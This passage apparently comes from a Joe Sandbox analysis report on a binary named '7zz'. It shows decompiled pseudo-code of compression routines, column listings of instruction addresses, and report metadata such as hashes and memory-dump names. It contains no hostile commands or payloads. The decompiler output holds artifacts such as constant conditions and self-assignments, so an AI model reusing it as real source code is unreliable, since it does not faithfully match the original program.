							_t539 =  *((intOrPtr*)(_t636 + 0x3c));
							_t591 = 0;
							_t609 = _t636 + 0x70;
							do {
								_t353 =  *((intOrPtr*)(_t478 + _t539));
								_t478 = _t478 + 1;
								if(0 >= 0xff) {
									_t353 = 0;
									_t478 = _t478 + 1;
								}
								 *_t609 = _t353;
								_t591 = _t591 + 1;
								_t609 = _t609 + 4;
							} while (_t591 < 0x32 && _t478 <  *((intOrPtr*)(_t636 + 0x20)));
							 *((intOrPtr*)(_t636 + 0x30)) = _t478;
							 *((intOrPtr*)(_t636 + 0x24)) = 0xffffffff;
							 *(_t636 + 0x10) = 0;
							_t633 = _t632 + 0x14;
							do {
								_t610 = 0;
								_t354 = 0;
								_t479 = _t636 + 0x70;
								do {
									_t479 = _t479 + 4;
									_t610 = _t610;
									_t354 = _t354 + 1;
								} while (_t354 < _t591);
								if(_t610 <  *((intOrPtr*)(_t636 + 0x24))) {
									 *((intOrPtr*)(_t636 + 0x24)) = _t610;
									 *( *(_t636 + 0x1c)) =  *(_t636 + 0x10);
								}
								_t356 =  *(_t636 + 0x10) + 1;
								_t633 = _t633 + 0x102;
								 *(_t636 + 0x10) = _t356;
							} while (_t356 <  *(_t636 + 0x18));
							_t632 =  *((intOrPtr*)(_t636 + 0x54));
							_t611 = _t632 + 0x5d6e388;
							 *((intOrPtr*)(_t636 + 0x34)) =  *((intOrPtr*)(_t636 + 0x34)) + 1;
							 *(_t636 + 0x1c) =  *(_t636 + 0x1c) + 1;
							_t483 = 0;
							_t544 = _t636 + 0x70;
							do {
								_t361 =  *_t544;
								_t544 =  &(_t544[1]);
								_t483 = _t483 + 1;
								 *((intOrPtr*)(_t611 + _t361 * 4)) =  *((intOrPtr*)(_t611 + _t361 * 4)) + 1;
							} while (_t483 < _t591);
							_t478 =  *((intOrPtr*)(_t636 + 0x30));
						} while (_t478 <  *((intOrPtr*)(_t636 + 0x20)));
						_t592 = 0;
						_t429 = _t632 + 0x14;
						_t612 = _t632 + 0x620;
						do {
							_t484 = 0;
							_t364 = _t612;
							do {
								if( *_t364 == 0) {
									 *_t364 = 1;
								}
								_t484 = _t484 + 1;
								_t364 = _t364 + 4;
							} while (_t484 <  *(_t636 + 0x38));
							_push(0x10);
							_push(0x102);
							_push(_t429);
							E00459960(_t612, _t612 + 0x1830);
							_t592 = _t592 + 1;
							_t429 = _t429 + 0x102;
							_t612 = _t612 + 0x408;
						} while (_t592 <  *(_t636 + 0x18));
						_t368 =  *(_t636 + 0x28) - 1;
						 *(_t636 + 0x28) = _t368;
					} while (_t368 != 0);
					_t369 = 0;
					do {
						 *((char*)(_t636 + _t369 + 0x40)) = _t369;
						_t369 = _t369 + 1;
					} while (_t369 <  *(_t636 + 0x18));
					_t370 =  *((intOrPtr*)(_t636 + 0x40));
					_t593 = 0;
					do {
						_t430 =  *((intOrPtr*)(_t593 + _t632 + 0x3680));
						_t613 = 0;
						if(_t370 != _t430) {
							do {
								E00448610(1);
								_t399 =  *((intOrPtr*)(_t636 + _t613 + 0x41));
								_t613 = _t613 + 1;
							} while (_t399 != _t430);
						}
						E00448610(0);
						while(_t613 > 0) {
							 *((char*)(_t636 + _t613 + 0x40)) =  *((intOrPtr*)(_t636 + _t613 + 0x3f));
							_t613 = _t613 - 1;
						}
						_t593 = _t593 + 1;
						_t370 = _t430;
						 *((char*)(_t636 + 0x40)) = _t370;
					} while (_t593 <  *(_t636 + 0x4c));
					 *(_t636 + 0x28) = 0;
					 *(_t636 + 0x10) = _t632 + 0x14;
					do {
						_t614 = 0;
						E00448580(_t632, 0, 5);
						_t431 = 0;
						do {
							while(_t614 != 0) {
								E00448610(1);
								if(_t614 >= 0) {
									E00448610(1);
									_t614 = _t614 - 1;
								} else {
									E00448610(0);
									_t614 = _t614 + 1;
								}
							}
							E00448610(0);
							_t431 = _t431 + 1;
						} while (_t431 <  *(_t636 + 0x38));
						_t379 =  *(_t636 + 0x28) + 1;
						 *(_t636 + 0x28) = _t379;
						 *(_t636 + 0x10) =  *(_t636 + 0x10) + 0x102;
					} while (_t379 <  *(_t636 + 0x18));
					 *((intOrPtr*)(_t636 + 0x30)) = 0;
					 *((intOrPtr*)(_t636 + 0x34)) = 0;
					 *((intOrPtr*)(_t636 + 0x24)) = 0;
					 *(_t636 + 0x10) = 0;
					 *(_t636 + 0x28) = _t632 + 0x3680;
					do {
						_t382 =  *(_t636 + 0x10);
						_t498 =  *((intOrPtr*)(_t382 +  *((intOrPtr*)(_t636 + 0x3c))));
						_t383 = _t382 + 1;
						 *(_t636 + 0x10) = _t383;
						if(0 >= 0xff) {
							_t498 = 0;
							 *(_t636 + 0x10) = _t383 + 1;
						}
						_t552 =  *((intOrPtr*)(_t636 + 0x30));
						if(_t552 == 0) {
							_t552 = 0x32;
							 *(_t636 + 0x28) =  *(_t636 + 0x28) + 1;
							 *((intOrPtr*)(_t636 + 0x34)) = _t632 + 0x175b76e;
							 *((intOrPtr*)(_t636 + 0x24)) = _t632 + 0x5d6fbb8;
						}
						 *((intOrPtr*)(_t636 + 0x30)) = _t552 - 1;
						_t385 =  *(_t632 + 0x10);
						_t616 = 0;
						_t595 =  *( *((intOrPtr*)(_t636 + 0x24)) + _t498 * 4);
						if(0 > 0) {
							do {
								_t500 = _t385[1];
								if(_t616 < _t500) {
									_t500 = _t616;
								}
								_t616 = _t616 - _t500;
								 *(_t636 + 0x1c) = _t500;
								_t385[2] = _t385[2] << _t500;
								_t565 = _t595 >> _t616;
								_t433 = _t565 | _t385[2];
								_t385[2] = _t433;
								_t595 = _t595 - (_t565 << _t616);
								_t568 = _t385[1] -  *(_t636 + 0x1c);
								_t385[1] = _t568;
								if(_t568 == 0) {
									 *(_t385[3] +  *_t385) = _t433;
									_t385[1] = 8;
									 *_t385 =  *_t385 + 1;
								}
							} while (_t616 > 0);
						}
					} while ( *(_t636 + 0x10) <  *((intOrPtr*)(_t636 + 0x20)));
					_t387 =  *((intOrPtr*)(_t632 + 0x8cdc));
					if(_t387 != 0) {
						_t470 =  *(_t632 + 0x10);
						_t604 =  *(_t636 + 0x58);
						_t596 =  *(_t636 + 0x2c);
						_t387 = 8 +  *_t470 * 8 - _t470[1] - _t604;
						if(_t387 >  *((intOrPtr*)(_t636 + 0x50))) {
							L126:
							_t587 = _t596 + 1;
							 *(_t636 + 0x2c) = _t587;
							if(_t587 <= 7) {
								_t420 =  *(_t636 + 0x5c);
								continue;
							}
						} else {
							if(_t596 != 6) {
								 *((intOrPtr*)(_t636 + 0x50)) = _t387;
								 *(_t636 + 0x48) = _t596;
								goto L126;
							}
						}
					}
					return _t387;
					L44:
					if(_t420 >= 0xc8) {
						if(_t420 >= 0x258) {
							if(_t420 >= 0x4b0) {
								asm("sbb eax, eax");
								_t342 = _t341 + 6;
								goto L51;
							} else {
								 *(_t636 + 0x18) = 4;
							}
						} else {
							 *(_t636 + 0x18) = 3;
						}
					} else {
						 *(_t636 + 0x18) = 2;
					}
					goto L52;
				}
			}






























































































                                                                      0x0044873a
                                                                      0x0044873e
                                                                      0x00448742
                                                                      0x00448747
                                                                      0x00448758
                                                                      0x00448764
                                                                      0x00448769
                                                                      0x00448775
                                                                      0x00448782
                                                                      0x00448786
                                                                      0x00448788
                                                                      0x0044878c
                                                                      0x0044878c
                                                                      0x00448790
                                                                      0x00448796
                                                                      0x00448798
                                                                      0x004487a4
                                                                      0x004487a7
                                                                      0x004487a7
                                                                      0x00448798
                                                                      0x004487b0
                                                                      0x004487b2
                                                                      0x004487bb
                                                                      0x004487bf
                                                                      0x004487c6
                                                                      0x004487c7
                                                                      0x004487c7
                                                                      0x004487cb
                                                                      0x004487cc
                                                                      0x004487d3
                                                                      0x004487d5
                                                                      0x004487dc
                                                                      0x004487e1
                                                                      0x004487e2
                                                                      0x004487e7
                                                                      0x004487e9
                                                                      0x004487f4
                                                                      0x00448800
                                                                      0x00448800
                                                                      0x00448805
                                                                      0x00448806
                                                                      0x00448816
                                                                      0x00448826
                                                                      0x00448826
                                                                      0x00448832
                                                                      0x00448836
                                                                      0x00448838
                                                                      0x0044883b
                                                                      0x0044883f
                                                                      0x00448843
                                                                      0x0044884a
                                                                      0x0044884e
                                                                      0x0044885f
                                                                      0x00448862
                                                                      0x00448866
                                                                      0x0044886a
                                                                      0x0044886c
                                                                      0x0044886c
                                                                      0x00448870
                                                                      0x00448871
                                                                      0x0044886c
                                                                      0x00448875
                                                                      0x0044887a
                                                                      0x0044887e
                                                                      0x00448884
                                                                      0x00448885
                                                                      0x00448888
                                                                      0x00448890
                                                                      0x00448897
                                                                      0x0044889f
                                                                      0x004488a7
                                                                      0x004488af
                                                                      0x004488b7
                                                                      0x004488bf
                                                                      0x004488c3
                                                                      0x004488c6
                                                                      0x004488cb
                                                                      0x004488cf
                                                                      0x004488cf
                                                                      0x004488d5
                                                                      0x004488d7
                                                                      0x004488db
                                                                      0x004488df
                                                                      0x004488e0
                                                                      0x004488e4
                                                                      0x004488e4
                                                                      0x004488ea
                                                                      0x004488ee
                                                                      0x004488f5
                                                                      0x004488f7
                                                                      0x004488f7
                                                                      0x00448901
                                                                      0x00448904
                                                                      0x00448914
                                                                      0x00448916
                                                                      0x00448916
                                                                      0x004488f7
                                                                      0x00448920
                                                                      0x00448934
                                                                      0x00448922
                                                                      0x00448922
                                                                      0x00448928
                                                                      0x0044892b
                                                                      0x0044892b
                                                                      0x00448945
                                                                      0x00448947
                                                                      0x004488f0
                                                                      0x004488f0
                                                                      0x004488f0
                                                                      0x00448958
                                                                      0x0044895e
                                                                      0x00448962
                                                                      0x00448962
                                                                      0x0044896e
                                                                      0x00448970
                                                                      0x00448970
                                                                      0x0044897a
                                                                      0x0044897d
                                                                      0x0044898d
                                                                      0x0044898f
                                                                      0x0044898f
                                                                      0x00448970
                                                                      0x00448993
                                                                      0x0044899c
                                                                      0x004489a7
                                                                      0x004489ab
                                                                      0x004489ac
                                                                      0x0044899e
                                                                      0x004489a2
                                                                      0x004489a2
                                                                      0x004489bf
                                                                      0x004489c1
                                                                      0x004489c5
                                                                      0x004489c7
                                                                      0x004489ce
                                                                      0x004489d3
                                                                      0x004489d3
                                                                      0x004489d5
                                                                      0x004489d8
                                                                      0x004489da
                                                                      0x004489da
                                                                      0x004489dd
                                                                      0x004489e0
                                                                      0x004489e5
                                                                      0x004489e9
                                                                      0x004489f2
                                                                      0x004489fa
                                                                      0x00448a0a
                                                                      0x00448a0f
                                                                      0x00448a13
                                                                      0x00448a1b
                                                                      0x00448a1f
                                                                      0x00448a29
                                                                      0x00448a29
                                                                      0x00448a31
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00448a3c
                                                                      0x00448a4b
                                                                      0x00448a4e
                                                                      0x00448a51
                                                                      0x00448a54
                                                                      0x00448a57
                                                                      0x00448a5f
                                                                      0x00448aa6
                                                                      0x00448aa6
                                                                      0x00448a59
                                                                      0x00448a59
                                                                      0x00448a59
                                                                      0x00448aaa
                                                                      0x00448aaa
                                                                      0x00448ab3
                                                                      0x00448ac1
                                                                      0x00448ac8
                                                                      0x00448acd
                                                                      0x00448ad1
                                                                      0x00448ad5
                                                                      0x00448ae0
                                                                      0x00448ae4
                                                                      0x00448ae6
                                                                      0x00448ae8
                                                                      0x00448aea
                                                                      0x00448aee
                                                                      0x00448af0
                                                                      0x00448af7
                                                                      0x00448af7
                                                                      0x00448af9
                                                                      0x00448afc
                                                                      0x00448afe
                                                                      0x00448aff
                                                                      0x00448af7
                                                                      0x00448b03
                                                                      0x00448b03
                                                                      0x00448b08
                                                                      0x00448b21
                                                                      0x00448b23
                                                                      0x00448b23
                                                                      0x00448b2a
                                                                      0x00448b2e
                                                                      0x00448b30
                                                                      0x00448b32
                                                                      0x00448b3c
                                                                      0x00448b38
                                                                      0x00448b38
                                                                      0x00448b38
                                                                      0x00448b41
                                                                      0x00448b48
                                                                      0x00448b49
                                                                      0x00448b51
                                                                      0x00448b57
                                                                      0x00448b59
                                                                      0x00448b61
                                                                      0x00448b67
                                                                      0x00448b6b
                                                                      0x00448b6b
                                                                      0x00448b75
                                                                      0x00448b79
                                                                      0x00448b81
                                                                      0x00448b81
                                                                      0x00448b85
                                                                      0x00448b87
                                                                      0x00448b8d
                                                                      0x00448b8f
                                                                      0x00448b91
                                                                      0x00448b97
                                                                      0x00448b9f
                                                                      0x00448b9f
                                                                      0x00448b9f
                                                                      0x00448ba3
                                                                      0x00448bab
                                                                      0x00448baf
                                                                      0x00448bb3
                                                                      0x00448bb3
                                                                      0x00448bb7
                                                                      0x00448bb9
                                                                      0x00448bbd
                                                                      0x00448bbf
                                                                      0x00448bc2
                                                                      0x00448bc8
                                                                      0x00448bcf
                                                                      0x00448bd1
                                                                      0x00448bd1
                                                                      0x00448bd2
                                                                      0x00448bd4
                                                                      0x00448bd5
                                                                      0x00448bd8
                                                                      0x00448be3
                                                                      0x00448be7
                                                                      0x00448bef
                                                                      0x00448bf7
                                                                      0x00448bfa
                                                                      0x00448bfa
                                                                      0x00448bfc
                                                                      0x00448bfe
                                                                      0x00448c02
                                                                      0x00448c06
                                                                      0x00448c0c
                                                                      0x00448c0e
                                                                      0x00448c0f
                                                                      0x00448c17
                                                                      0x00448c21
                                                                      0x00448c25
                                                                      0x00448c25
                                                                      0x00448c2f
                                                                      0x00448c30
                                                                      0x00448c38
                                                                      0x00448c38
                                                                      0x00448c3e
                                                                      0x00448c5c
                                                                      0x00448c63
                                                                      0x00448c67
                                                                      0x00448c6b
                                                                      0x00448c6d
                                                                      0x00448c71
                                                                      0x00448c71
                                                                      0x00448c73
                                                                      0x00448c7d
                                                                      0x00448c80
                                                                      0x00448c80
                                                                      0x00448c84
                                                                      0x00448c8c
                                                                      0x00448c94
                                                                      0x00448c96
                                                                      0x00448c99
                                                                      0x00448c9f
                                                                      0x00448c9f
                                                                      0x00448ca1
                                                                      0x00448ca3
                                                                      0x00448ca6
                                                                      0x00448ca8
                                                                      0x00448ca8
                                                                      0x00448cb2
                                                                      0x00448cb3
                                                                      0x00448cb6
                                                                      0x00448cba
                                                                      0x00448cbc
                                                                      0x00448cc1
                                                                      0x00448cca
                                                                      0x00448cd3
                                                                      0x00448cd4
                                                                      0x00448cda
                                                                      0x00448ce0
                                                                      0x00448ce8
                                                                      0x00448ce9
                                                                      0x00448ce9
                                                                      0x00448cf3
                                                                      0x00448cf5
                                                                      0x00448cf9
                                                                      0x00448cfd
                                                                      0x00448cfe
                                                                      0x00448d02
                                                                      0x00448d06
                                                                      0x00448d08
                                                                      0x00448d08
                                                                      0x00448d0f
                                                                      0x00448d13
                                                                      0x00448d15
                                                                      0x00448d19
                                                                      0x00448d1e
                                                                      0x00448d22
                                                                      0x00448d23
                                                                      0x00448d15
                                                                      0x00448d2b
                                                                      0x00448d32
                                                                      0x00448d38
                                                                      0x00448d3c
                                                                      0x00448d3d
                                                                      0x00448d45
                                                                      0x00448d46
                                                                      0x00448d4a
                                                                      0x00448d4a
                                                                      0x00448d53
                                                                      0x00448d5b
                                                                      0x00448d5f
                                                                      0x00448d6b
                                                                      0x00448d6e
                                                                      0x00448d73
                                                                      0x00448d75
                                                                      0x00448d82
                                                                      0x00448d88
                                                                      0x00448d8f
                                                                      0x00448da1
                                                                      0x00448da6
                                                                      0x00448d91
                                                                      0x00448d95
                                                                      0x00448d9a
                                                                      0x00448d9a
                                                                      0x00448da7
                                                                      0x00448daf
                                                                      0x00448db8
                                                                      0x00448db9
                                                                      0x00448dc9
                                                                      0x00448dd2
                                                                      0x00448dd6
                                                                      0x00448dd6
                                                                      0x00448dde
                                                                      0x00448de2
                                                                      0x00448de6
                                                                      0x00448dea
                                                                      0x00448df4
                                                                      0x00448df8
                                                                      0x00448df8
                                                                      0x00448e02
                                                                      0x00448e05
                                                                      0x00448e0c
                                                                      0x00448e10
                                                                      0x00448e17
                                                                      0x00448e1a
                                                                      0x00448e1a
                                                                      0x00448e1e
                                                                      0x00448e24
                                                                      0x00448e2c
                                                                      0x00448e34
                                                                      0x00448e43
                                                                      0x00448e55
                                                                      0x00448e55
                                                                      0x00448e5e
                                                                      0x00448e67
                                                                      0x00448e6a
                                                                      0x00448e72
                                                                      0x00448e75
                                                                      0x00448e77
                                                                      0x00448e77
                                                                      0x00448e7c
                                                                      0x00448e7e
                                                                      0x00448e7e
                                                                      0x00448e83
                                                                      0x00448e87
                                                                      0x00448e8d
                                                                      0x00448e92
                                                                      0x00448e99
                                                                      0x00448ea3
                                                                      0x00448ea6
                                                                      0x00448eab
                                                                      0x00448ead
                                                                      0x00448eb0
                                                                      0x00448eb7
                                                                      0x00448ebd
                                                                      0x00448ec4
                                                                      0x00448ec4
                                                                      0x00448ec6
                                                                      0x00448e77
                                                                      0x00448ed2
                                                                      0x00448eda
                                                                      0x00448ee2
                                                                      0x00448ee4
                                                                      0x00448ee7
                                                                      0x00448eef
                                                                      0x00448f01
                                                                      0x00448f05
                                                                      0x00448f14
                                                                      0x00448f14
                                                                      0x00448f18
                                                                      0x00448f1c
                                                                      0x00448a25
                                                                      0x00000000
                                                                      0x00448a25
                                                                      0x00448f07
                                                                      0x00448f0a
                                                                      0x00448f0c
                                                                      0x00448f10
                                                                      0x00000000
                                                                      0x00448f10
                                                                      0x00448f0a
                                                                      0x00448f05
                                                                      0x00448f2c
                                                                      0x00448a65
                                                                      0x00448a6b
                                                                      0x00448a7d
                                                                      0x00448a8f
                                                                      0x00448aa1
                                                                      0x00448aa3
                                                                      0x00000000
                                                                      0x00448a91
                                                                      0x00448a91
                                                                      0x00448a91
                                                                      0x00448a7f
                                                                      0x00448a7f
                                                                      0x00448a7f
                                                                      0x00448a6d
                                                                      0x00448a6d
                                                                      0x00448a6d
                                                                      0x00000000
                                                                      0x00448a6b

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: YA1
                                                                      • API String ID: 0-613462611
                                                                      • Opcode ID: 40c36dd2d9e12414e66adf71fdb657f7f3508d8c1f6a41737e3c26815d29bb3b
                                                                      • Instruction ID: 099bcbc28d88e1846a75dfe823cd1f8e9a6e0cdfc63d5bc2b083594896ecf992
                                                                      • Opcode Fuzzy Hash: 40c36dd2d9e12414e66adf71fdb657f7f3508d8c1f6a41737e3c26815d29bb3b
                                                                      • Instruction Fuzzy Hash: DE42D2716083818FE715DF28C49066FBBE2BFD9308F14496EE8D59B342DA35D806CB86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004469A0 Relevance: 1.7, Strings: 1, Instructions: 496COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 94%
                                                                      			E004469A0(intOrPtr __ecx, intOrPtr __edx) {
				intOrPtr _t218;
				char _t226;
				char _t228;
				unsigned int _t241;
				intOrPtr _t243;
				signed char _t247;
				void* _t252;
				intOrPtr _t255;
				signed int _t257;
				signed char _t260;
				signed int _t267;
				signed int _t270;
				signed int _t275;
				signed int _t277;
				intOrPtr _t279;
				intOrPtr* _t280;
				signed int _t286;
				unsigned int _t294;
				unsigned int _t295;
				intOrPtr _t316;
				void _t317;
				intOrPtr _t318;
				void* _t319;
				unsigned int _t320;
				intOrPtr _t324;
				void* _t346;
				signed int _t350;
				intOrPtr _t359;
				signed int _t362;
				signed int _t363;
				signed int _t365;
				signed char _t367;
				signed int _t368;
				signed int _t378;
				signed char _t385;
				intOrPtr _t394;
				intOrPtr _t396;
				unsigned int _t399;
				signed int _t400;
				signed int _t409;
				intOrPtr* _t423;
				int _t424;
				intOrPtr _t425;
				intOrPtr* _t426;
				signed int _t430;
				signed int _t431;
				signed int* _t436;
				signed int _t445;
				void* _t446;
				void* _t447;
				void* _t448;
				unsigned int _t455;
				signed int _t460;
				unsigned int* _t462;
				intOrPtr _t463;
				void* _t465;
				char* _t468;
				void* _t469;
				signed int _t470;
				intOrPtr _t471;
				void* _t472;
				intOrPtr* _t473;
				signed int _t478;
				signed int _t481;
				intOrPtr _t484;
				unsigned int _t486;
				unsigned int _t489;
				signed int _t491;
				signed int _t492;
				intOrPtr _t495;
				signed int _t496;
				void* _t497;
				signed int _t502;
				void* _t503;
				void* _t504;
				void* _t506;

				_t468 =  *((intOrPtr*)(_t503 + 0x314));
				 *((intOrPtr*)(_t503 + 0x3c)) = __edx;
				 *((intOrPtr*)(_t503 + 0x10)) = __ecx;
				if(_t468 != 0) {
					 *_t468 = E00447070() & 0xffffff00 | _t313 != 0x00000000;
				}
				_t218 = E00446FF0(0x18);
				 *((intOrPtr*)( *((intOrPtr*)(_t503 + 0x314)))) = _t218;
				if(_t218 >=  *((intOrPtr*)(_t503 + 0x304))) {
					L82:
					return 1;
				} else {
					memset(_t503 + 0xa8, 0, 0x40 << 2);
					_t504 = _t503 + 0xc;
					_t445 = 0;
					_t469 = 0;
					 *(_t504 + 0x28) = 0;
					do {
						 *((char*)(_t504 + _t469 + 0x44)) = E00447070();
						_t469 = _t469 + 1;
					} while (_t469 < 0x10);
					_t470 = 0;
					do {
						if( *((intOrPtr*)(_t504 + (_t470 >> 4) + 0x44)) != 0 && E00447070() != 0) {
							_t409 = _t445;
							_t445 = _t445 + 1;
							 *(_t504 + 0xa8 + (_t409 >> 2) * 4) =  *(_t504 + 0xa8 + (_t409 >> 2) * 4) | (_t470 & 0x000000ff) << (_t409 & 0x00000003) << 0x00000003;
						}
						_t470 = _t470 + 1;
					} while (_t470 < 0x100);
					 *(_t504 + 0x28) = _t445;
					if(_t445 == 0) {
						goto L82;
					} else {
						_t471 = E00446FF0(3);
						 *((intOrPtr*)(_t504 + 0x14)) = _t471;
						if(_t471 < 2 || _t471 > 6) {
							goto L82;
						} else {
							_t316 = E00446FF0(0xf);
							 *((intOrPtr*)(_t504 + 0x40)) = _t316;
							if(_t316 < 1 || _t316 > 0x4652) {
								goto L82;
							} else {
								_t226 = 0;
								do {
									 *((char*)(_t504 + _t226 + 0x30)) = _t226;
									_t226 = _t226 + 1;
								} while (_t226 < _t471);
								_t495 =  *((intOrPtr*)(_t504 + 0x308));
								_t446 = 0;
								do {
									_t472 = 0;
									if(E00447070() == 0) {
										L21:
										_t228 =  *((intOrPtr*)(_t504 + _t472 + 0x30));
										while(_t472 > 0) {
											 *((char*)(_t504 + _t472 + 0x30)) =  *((intOrPtr*)(_t504 + _t472 + 0x2f));
											_t472 = _t472 - 1;
										}
										goto L23;
									} else {
										while(1) {
											_t472 = _t472 + 1;
											if(_t472 >=  *((intOrPtr*)(_t504 + 0x14))) {
												goto L82;
											}
											if(E00447070() != 0) {
												continue;
											} else {
												goto L21;
											}
											goto L83;
										}
										goto L82;
									}
									goto L83;
									L23:
									 *((char*)(_t446 + _t495)) = _t228;
									_t446 = _t446 + 1;
									 *((char*)(_t504 + 0x30)) = _t228;
								} while (_t446 < _t316);
								_t473 =  *((intOrPtr*)(_t504 + 0x30c));
								_t496 =  *(_t504 + 0x28);
								 *(_t504 + 0x18) = 0;
								do {
									_t317 = E00446FF0(5);
									_t447 = 0;
									if(_t496 + 2 <= 0) {
										L32:
										_t448 = _t504 + _t447 + 0x1fc;
										memset(_t448 + (0x102 - _t447 >> 2), memset(_t448, 0, 0x102 << 2), 2 << 0);
										_t504 = _t504 + 0x18;
										goto L33;
									} else {
										while(_t317 >= 1 && _t317 <= 0x14) {
											if(E00447070() == 0) {
												 *(_t504 + _t447 + 0x1fc) = _t317;
												_t447 = _t447 + 1;
												if(_t447 < _t496 + 2) {
													continue;
												} else {
													if(_t447 < 0x102) {
														goto L32;
													}
													L33:
													_t423 = _t473 + 0xa8;
													memset(_t504 + 0x58, 0, 0x14 << 2);
													_t504 = _t504 + 0xc;
													_t346 = 0;
													while(0 <= 0x14) {
														 *_t423 = 0xffffffff;
														_t346 = _t346 + 1;
														_t423 = _t423 + 4;
														 *((intOrPtr*)(_t504 + 0x54)) =  *((intOrPtr*)(_t504 + 0x54)) + 1;
														if(_t346 < 0x102) {
															continue;
														} else {
															_t455 = 0;
															_t318 = 0;
															 *((intOrPtr*)(_t504 + 0x54)) = 0;
															 *_t473 = 0;
															 *((intOrPtr*)(_t473 + 0x54)) = 0;
															 *((intOrPtr*)(_t504 + 0x20)) = 0;
															_t424 = 1;
															while(1) {
																_t455 = _t455 + ( *(_t504 + 0x54 + _t424 * 4) << 0x14 - _t424);
																 *(_t504 + 0x2c) = _t455;
																if(_t455 > 0x100000) {
																	goto L82;
																}
																_t241 = 0x100000;
																if(_t424 != 0x14) {
																	_t241 = _t455;
																}
																 *(_t473 + _t424 * 4) = _t241;
																_t243 =  *((intOrPtr*)(_t504 + 0x50 + _t424 * 4)) +  *((intOrPtr*)(_t473 + 0x50 + _t424 * 4));
																 *((intOrPtr*)(_t473 + 0x54 + _t424 * 4)) = _t243;
																 *((intOrPtr*)(_t504 + 0x1a8 + _t424 * 4)) = _t243;
																if(_t424 <= 9) {
																	_t294 =  *(_t473 + _t424 * 4) >> 0xb;
																	if(_t318 < _t294) {
																		_t295 = _t294 - _t318;
																		_t465 = _t473 + _t318 + 0x4b0;
																		 *(_t504 + 0x24) = _t295;
																		_t399 = _t295;
																		_t502 = _t399;
																		_t324 =  *((intOrPtr*)(_t504 + 0x20));
																		_t400 = _t399 >> 2;
																		memset(_t465 + _t400, memset(_t465, _t424, _t400 << 2), (_t502 & 0x00000003) << 0);
																		_t504 = _t504 + 0x18;
																		_t455 =  *(_t504 + 0x2c);
																		_t496 =  *(_t504 + 0x28);
																		_t318 = _t324 + _t502;
																		 *((intOrPtr*)(_t504 + 0x20)) = _t318;
																	}
																}
																_t424 = _t424 + 1;
																if(_t424 <= 0x14) {
																	continue;
																} else {
																	_t425 = 0;
																	do {
																		if(0 != 0) {
																			_t350 =  *(_t504 + 0x1a8);
																			 *((intOrPtr*)(_t473 + 0xa8 + _t350 * 4)) = _t425;
																			 *(_t504 + 0x1a8) = _t350 + 1;
																		}
																		_t425 = _t425 + 1;
																	} while (_t425 < 0x102);
																	goto L48;
																}
																goto L83;
															}
															goto L82;
														}
														goto L83;
													}
													goto L82;
												}
											} else {
												_t317 = _t317 + 1 - (E00447070() << 1);
												continue;
											}
											goto L83;
										}
										goto L82;
									}
									goto L83;
									L48:
									_t247 =  *(_t504 + 0x18) + 1;
									_t473 = _t473 + 0x6b0;
									 *(_t504 + 0x18) = _t247;
								} while (_t247 <  *((intOrPtr*)(_t504 + 0x14)));
								_t319 =  *(_t504 + 0x3c);
								_t497 = 0;
								memset(_t319, 0, 0x100 << 2);
								_t506 = _t504 + 0xc;
								 *(_t506 + 0x1c) = 0;
								 *((intOrPtr*)(_t506 + 0x38)) = 0;
								 *((intOrPtr*)(_t506 + 0x18)) = 0;
								 *(_t506 + 0x20) = 0;
								 *((intOrPtr*)(_t506 + 0x14)) = 0;
								while(1) {
									L50:
									_t426 =  *((intOrPtr*)(_t506 + 0x10));
									L51:
									while(1) {
										if( *((intOrPtr*)(_t506 + 0x18)) != 0) {
											L54:
											 *((intOrPtr*)(_t506 + 0x18)) =  *((intOrPtr*)(_t506 + 0x18)) - 1;
											_t478 =  *(_t426 + 4) >> 0x00000008 -  *_t426 >> 0x00000004 & 0x000fffff;
											if(_t478 >=  *((intOrPtr*)(_t497 + 0x24))) {
												_t133 = _t497 + 0x28; // 0x28
												_t252 = _t133;
												_t460 = 0xa;
												if(_t478 >=  *((intOrPtr*)(_t497 + 0x28))) {
													do {
														_t396 =  *((intOrPtr*)(_t252 + 4));
														_t252 = _t252 + 4;
														_t460 = _t460 + 1;
													} while (_t478 >= _t396);
												}
											} else {
												_t460 = 0;
											}
											_t359 =  *_t426 + _t460;
											 *_t426 = _t359;
											if(_t359 >= 8) {
												do {
													_t280 =  *((intOrPtr*)(_t426 + 8));
													if(_t280 <  *((intOrPtr*)(_t426 + 0xc))) {
														 *(_t506 + 0x2c) =  *_t280;
														 *((intOrPtr*)(_t426 + 8)) = _t280 + 1;
													} else {
														_t286 = E0040E070( *((intOrPtr*)(_t506 + 0x10)) + 8);
														_t426 =  *((intOrPtr*)(_t506 + 0x10));
														 *(_t506 + 0x2c) = _t286;
													}
													_t394 =  *_t426 + 0xfffffff8;
													 *(_t426 + 4) =  *(_t426 + 4) << 0x00000008 |  *(_t506 + 0x2c) & 0x000000ff;
													 *_t426 = _t394;
												} while (_t394 >= 8);
											}
											_t362 = 0x14 - _t460;
											_t481 = (_t478 -  *((intOrPtr*)(_t497 + _t460 * 4 - 4)) >> _t362) +  *((intOrPtr*)(_t497 + 0x54 + _t460 * 4));
											if(_t481 < 0x102) {
												_t363 =  *(_t497 + 0xa8 + _t481 * 4);
												if(_t363 >= 2) {
													goto L65;
												} else {
													_t385 =  *(_t506 + 0x20);
